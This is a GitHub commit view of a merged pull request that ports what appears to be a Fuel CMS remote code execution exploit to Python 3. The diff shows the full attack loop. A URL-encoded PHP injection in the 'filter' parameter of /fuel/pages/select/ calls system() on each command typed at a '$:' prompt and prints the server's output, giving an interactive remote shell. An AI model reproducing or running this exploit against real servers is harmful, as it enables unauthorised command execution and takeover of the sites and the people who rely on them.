Merge pull request #1 from beauknowstech/master

Fixed for all Python 3.x
This commit is contained in:
Martín
2021-10-18 02:55:48 +02:00
committed by GitHub

View File

@@ -22,7 +22,7 @@ proxy = {"http" : "http://127.0.0.1:8080"} # Proxies you are behind (example is
while 1: while 1:
command = input("$: ") command = input("$: ")
exploit_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(command)+"%27%29%2b%27" exploit_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.parse.quote(command)+"%27%29%2b%27"
r = requests.get(exploit_url, proxies=proxy) r = requests.get(exploit_url, proxies=proxy)
print(r.text[r.text.find("system")+6:r.text.find("<div ")]) print(r.text[r.text.find("system")+6:r.text.find("<div ")])